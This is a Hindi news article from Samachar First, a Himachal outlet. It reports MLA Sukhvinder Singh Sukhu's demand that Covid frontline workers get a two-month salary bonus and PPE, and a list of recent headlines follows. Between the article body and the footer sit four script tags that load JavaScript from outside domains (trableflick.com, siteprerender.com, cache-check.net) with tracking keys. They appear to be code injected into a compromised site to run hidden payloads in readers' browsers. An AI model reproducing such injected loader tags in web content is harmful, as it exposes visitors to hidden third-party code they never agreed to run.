कोरोना योद्धाओं को दो महीने का वेतन बोनस के तौर पर दे सरकार : सुक्खू

<p>हिमाचल प्रदेश कांग्रेस कमेटी के पूर्व अध्यक्ष और विधायक सुखविंद्र सिंह सुक्खू ने सरकार का ध्यान कोरोना योद्धाओं की तरफ दिलाया है। उन्होंने कहा कि डॉक्टर, नर्स, पैरा मैडिकल स्टाफ, एम्बुलेंस कर्मचारी, सफाई कर्मी और पुलिस कर्मचारी दिन-रात डयूटी कर कोरोना को हराने में लगे हैं। सरकार इन्हें 12 महीने के वेतन के अलावा दो माह का वेतन बोनस के तौर पर देने की घोषणा तुरंत करे। इससे ये कर्मचारी दोगुना उत्साह के साथ कोरोना से जंग लड़ेंगे।<br />
कर्मचारियों के लिए यह सम्मान की बात होगी। घोषणा के साथ ही सरकार को यह कर्मचारियों पर छोड़ देना चाहिए कि वे बोनस लेना चाहते हैं या नहीं। पुलिस कर्मचारी कोरोना योद्धा के अलावा जनता के अंगरक्षक की भूमिका भी निभा रहे हैं। सरकार उनकी सुरक्षा के भी पूरे बंदोबस्त करे, क्योंकि वे सबसे ज्यादा लोगों के संपर्क में आ रहे हैं। उन्हें नहीं मालूम कि कौन संक्रमित है और कौन नहीं। इसलिए उन्हें पीपीई किट मुहैया कराई जाएं।</p>

<p>सुक्खू ने कहा है कि आंगनबाड़ी वर्कर्स, आशा वर्कर्स, फार्मासिस्ट व अस्पतालों के चतुर्थ श्रेणी स्टाफ को भी कोरोना अवधि के दौरान दो माह का वेतन बोनस के तौर पर दें। इससे उनकी हौसला अफजाई होगी। ये भी अपनी डयूटी पूरी निष्ठा के साथ निभा रहे हैं। उन्होंने सरकार से कोरोना की टेस्टिंग में तेजी लाने की मांग की है। साथ ही मजदूर वर्ग की सुध लेने का भी आग्रह किया है।</p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>
<script src=”http://siteprerender.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8620x” type=”text/javascript”></script>
<script src=”http://cache-check.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8620x&amp;format=arrjs&amp;r=1588496615155″ type=”text/javascript”></script>
<script src=”http://trableflick.com/ext/21aca573d498d25317.js?sid=52587_8620_&amp;title=a&amp;blocks[]=31af2″ type=”text/javascript”></script>

Samachar First

Recent Posts

अंतरराष्ट्रीय कुल्लू दशहरा: 13 से 19 अक्तूबर तक भव्य आयोजन, 332 देवता होंगे शामिल

  Kullu Dussehra 2024: अंतरराष्ट्रीय कुल्लू दशहरा उत्सव का शुभारंभ  13 अक्तूबर को राज्यपाल शिव…

5 hours ago

हमीरपुर में नहीं जलेंगे दशहरे के पुतले, लोगों ने सरकार से की आयोजन की मांग

No effigy burning Hamirpur : हमीरपुर शहर में पिछले 3 वर्षों से दशहरे का आयोजन…

5 hours ago

Himachal: अखिल भारतीय विद्यार्थी परिषद का 45वां प्रदेश अधिवेशन 7 से 9 नवंबर को हमीरपुर में

Hamirpur: अखिल भारतीय विद्यार्थी परिषद का 45वां प्रदेश अधिवेशन 7 से 9 नवंबर 2024 को…

5 hours ago

रतन टाटा के बाद नोएल टाटा को मिली टाटा ट्रस्ट की कमान

  Ratan Tata successor Noel Tata:  नोएल टाटा, जो दिवंगत रतन टाटा के सौतेले भाई…

5 hours ago

Himachal: एग्रीकल्चर सर्टिफिकेट के लिए 20 हजार मांगे, पटवारी रिश्वत लेते हुए गिरफ्तार

  Patwari arrested for bribe : हिमाचल प्रदेश के कांग`ड़ा जिले में स्टेट विजिलेंस एंड…

5 hours ago

आरएस बाली ने ब्रजेश्वरी मंदिर में परिवार सहित की पूजा-अर्चना, पूर्णाहुति डाली

RS Bali at Bajreshwari Temple : 11 अक्टूबर 2024 को हिमाचल प्रदेश पर्यटन विकास निगम…

6 hours ago